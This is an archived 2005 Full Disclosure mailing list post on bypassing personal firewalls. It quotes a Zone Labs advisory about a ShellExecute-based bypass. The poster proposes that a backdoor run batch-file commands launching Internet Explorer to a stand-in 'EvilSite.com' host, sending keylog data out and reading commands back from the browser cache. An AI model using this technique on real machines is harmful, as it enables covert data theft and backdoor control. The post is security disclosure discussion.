Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Bypassing Personal Firewall, is it that* hard?
From: Bipin Gautam <gautam.bipin () gmail com>
Date: Tue, 4 Oct 2005 00:11:34 +0545

hello list,
Lately 'Debasis Mohanty' was refreshing some old issues. Anyways... is
Bypassing Personal Firewall & let an internal (evil) application
communicate with the external world,  the hard. I mean... OK try
this........ Lets.. me give you a simple concept. I'll call it
'passive communication' ( in lack of better world)

say... a backdoor want to communicate to its server... It can do
is,.... use a trusted internal application to do the job. Suppose; it
creates a batch file run the batch file  (evil.bat) & executes this
command

....Internet Explorer\> iexplore.exe www.EvilSite.com/?cmd=submit&f=___KeyLog__

the batch file will get executed & Internet explorer will happily send
the DATA. This trick can be used to send OUTPUT as well as get
input... without trigering the firewall.

To get input; the backdoor can do is... say, run similar BAT script:

....Internet Explorer\> iexplore.exe www.EvilSite.com/?cmd=ANY_NEW_COMMANDS

well... the history of the page 
www.EvilSite.com/?cmd=ANY_NEW_COMMANDS will be there in the IE
cache... Then the backdoor can do is... RUN a string based 'GREP' in
the IE cache & see if there is any new job to acomplish.

just a rough theory... but ya its POSSIBLE; to let a internal backdoor
have I/O with its server without trigering the firewall alert....

---------------
yap it does work... using the same trick can't the backdoor happily
communicate with its server using the trick

On 9/30/05, Zone Labs Security Team <security () zonelabs com> wrote:
Zone Labs response to "Bypassing Personal Firewall (Zone Alarm Pro)
Using DDE-IPC"

Overview:

Debasis Mohanty published a notice about a potential security issue
with personal firewalls to several security email lists on
September 28th, 2005.   Zone Labs has investigated his claims
and has determined that current versions of Zone Labs and
Check Point end-point security products are not vulnerable.


Description:

The proof-of-concept code published uses the Windows API function
ShellExecute() to launch a trusted program that is used to access
the network on behalf of the untrusted program, thereby accessing
the network without warning from the firewall.


Impact:

If successfully exploited, a malicious program may be able to
access the network via a trusted program.   The ability to
access the network would be limited to the functionality of the
trusted program.


Unaffected Products:

ZoneAlarm Pro, ZoneAlarm AntiVirus, ZoneAlarm Wireless Security,
and ZoneAlarm Security Suite version 6.0 or later automatically
protect against this attack in the default configuration.

ZoneAlarm Pro, ZoneAlarm AntiVirus, ZoneAlarm Wireless Security,
and ZoneAlarm Security Suite version 5.5 are protected against
this attack by enabling the "Advanced Program Control" feature.

Check Point Integrity client versions 6.0 and 5.5 are protected
against this attack by enabling the "Advanced Program Control" feature.


Affected Products:

ZoneAlarm free versions lack the "Advanced Program Control"
feature and are therefore unable to prevent this bypass technique.


Recommended Actions:

Subscribers should upgrade to the latest version of their
ZoneAlarm product or enable the "Advanced Program Control" feature.


Related Resources:

Zone Labs Security Services http://www.zonelabs.com/security


Contact:

Zone Labs customers who are concerned about this vulnerability or
have additional technical questions may reach our Technical Support
group at: http://www.zonelabs.com/support/.

To report security issues with Zone Labs products contact
security () zonelabs com  Note that any other matters sent to this
email address will not receive a response.


Disclaimer:

The information in the advisory is believed to be accurate at the
time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS
condition. There are no warranties with regard to this information.
Neither the author nor the publisher accepts any liability for any
direct, indirect, or consequential loss or damage arising from use
of, or reliance on, this information. Zone Labs and Zone Labs
products, are registered trademarks of Zone Labs LLC. and/or
affiliated companies in the United States and other countries.
All other registered and unregistered trademarks represented in
this document are the sole property of their respective
companies/owners.

Copyright: (c)2005 Zone Labs LLC All rights reserved. Zone Labs,
TrueVector, ZoneAlarm, and Cooperative Enforcement are registered
trademarks of Zone Labs LLC The Zone Labs logo, Check Point
Integrity and IMsecure are trademarks of Zone Labs, LLC. Check Point
Integrity protected under U.S. Patent No. 5,987,611. Reg. U.S. Pat.
& TM Off. Cooperative Enforcement is a service mark of Zone Labs LLC.
All other trademarks are the property of their respective owners.
Any reproduction of this alert other than as an unmodified copy of
this file requires authorization from Zone Labs. Permission to
electronically redistribute this alert in its unmodified form is
granted. All other rights, including the use of other media, are
reserved by Zone Labs LLC.

--

Bipin Gautam

Zeroth law of security: The possibility of poking a system from lower
privilege is zero unless & until there is possibility of direct,
indirect or consequential communication between the two...
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault